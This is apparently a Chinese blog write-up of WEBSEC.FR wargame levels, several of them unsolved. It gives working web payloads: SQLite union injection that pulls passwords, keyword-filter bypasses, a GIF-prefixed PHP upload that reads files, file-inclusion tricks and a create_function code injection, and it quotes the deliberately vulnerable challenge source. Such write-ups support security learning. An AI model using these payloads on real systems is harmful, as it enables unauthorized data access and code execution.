WEBSEC.FR

/ 0评 / 0

国外的一个平台。看到队里师傅之前说有很多骚套路,正好BUU的题不会了,来做一下

babysteps

Level01

sqlite注入。

1 order by 2
#字段数为2
-1 union select 1,2
#1,2字段可回显
-1 union select 1,name from sqlite_master WHERE type='table'
#得到表名users
-1 union select 1,sql from sqlite_master WHERE type='table'
#得到表结构CREATE TABLE users(id int(7), username varchar(255), password varchar(255))
-1 union select 1,password from users where id=1
#得到Flag

Level04

给了源码

<?php
include 'connect.php';
$sql = new SQL();
$sql->connect();
$sql->query = 'SELECT username FROM users WHERE id=';
if (isset ($_COOKIE['leet_hax0r'])) {
    $sess_data = unserialize (base64_decode ($_COOKIE['leet_hax0r']));
    try {
        if (is_array($sess_data) && $sess_data['ip'] != $_SERVER['REMOTE_ADDR']) {
            die('CANT HACK US!!!');
        }
    } catch(Exception $e) {
        echo $e;
    }
} else {
    $cookie = base64_encode (serialize (array ( 'ip' => $_SERVER['REMOTE_ADDR']))) ;
    setcookie ('leet_hax0r', $cookie, time () + (86400 * 30));
}
if (isset ($_REQUEST['id']) && is_numeric ($_REQUEST['id'])) {
    try {
        $sql->query .= $_REQUEST['id'];
    } catch(Exception $e) {
        echo ' Invalid query';
    }
}
<?php
class SQL {
    public $query = '';
    public $conn;
    public function __construct() {
    }
    public function connect() {
        $this->conn = new SQLite3 ("database.db", SQLITE3_OPEN_READONLY);
    }
    public function SQL_query($query) {
        $this->query = $query;
    }
    public function execute() {
        return $this->conn->query ($this->query);
    }
    public function __destruct() {
        if (!isset ($this->conn)) {
            $this->connect ();
        }
        $ret = $this->execute ();
        if (false !== $ret) {
            while (false !== ($row = $ret->fetchArray (SQLITE3_ASSOC))) {
                echo '';
            }
        }
    }
}

审计后发现先过了一个cookie中的反序列化
然后进sql类。
构造一下就好了

替换cookie得到flag


Level17

数组一把梭
strcasecmp()函数遇到数组返回0,符合条件


Level25

<?php
parse_str(parse_url($_SERVER['REQUEST_URI'])['query'], $query);
foreach ($query as $k => $v) {
    if (stripos($v, 'flag') !== false)
        die('You are not allowed to get the flag, sorry :/');
}
include $_GET['page'] . '.txt';

问题在parse_url函数了,如果他访问一个不存在的地址就会返回false
payload:page=flag&:80
或者使用
http://websec.fr///level25/index.php?page=flag


Level28

<?php
if(isset($_POST['submit'])) {
    if ($_FILES['flag_file']['size'] > 4096) {
    die('Your file is too heavy.');
  }
  $filename = md5($_SERVER['REMOTE_ADDR']) . '.php';
  $fp = fopen($_FILES['flag_file']['tmp_name'], 'r');
  $flagfilecontent = fread($fp, filesize($_FILES['flag_file']['tmp_name']));
  @fclose($fp);
    file_put_contents($filename, $flagfilecontent);
  if (md5_file($filename) === md5_file('flag.php') && $_POST['checksum'] == crc32($_POST['checksum'])) {
    include($filename);  // it contains the <code class="prettyprint" >$flag variable
    } else {
        $flag = "Nope, $filename is not the right file, sorry.";
        sleep(1);  // Deter bruteforce
    }
  unlink($filename);
}

一个条件竞争的题
没复现成功

easy

Level02

和level01一样,只不过过滤了一些东西unionorderselectfromgroupby.双写就行
-1 uniunionon seselectlect 1,password frfromom users where id=1


Level08

文件包含,会检测gif头

GIF89a
<?php var_dump(scandir('./')); ?>

发现了flag.txt
读一下就行

GIF89a
<?php var_dump(file_get_contents('flag.txt')); ?>

Level10

给了源码

<?php
if (isset ($_REQUEST['f']) && isset ($_REQUEST['hash'])) {
    $file = $_REQUEST['f'];
    $request = $_REQUEST['hash'];
    $hash = substr (md5 ($flag . $file . $flag), 0, 8);
    echo '';
    if ($request == $hash) {
        show_source ($file);
    } else {
        echo 'Permission denied!';
    }
     echo '';
}

发现会截取md5($flag.$file.$flag)的前八位,如果比较正确就输出文件
然后就有点没思路了,flag未知,爆破不太合理。。
看一眼WP吧!
好像是个弱类型的题
暂时还没复现出来


Level11

暂时不会。。


Level15

create_function函数漏洞
之前写过了 不细说了
;}echo($flag);//

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注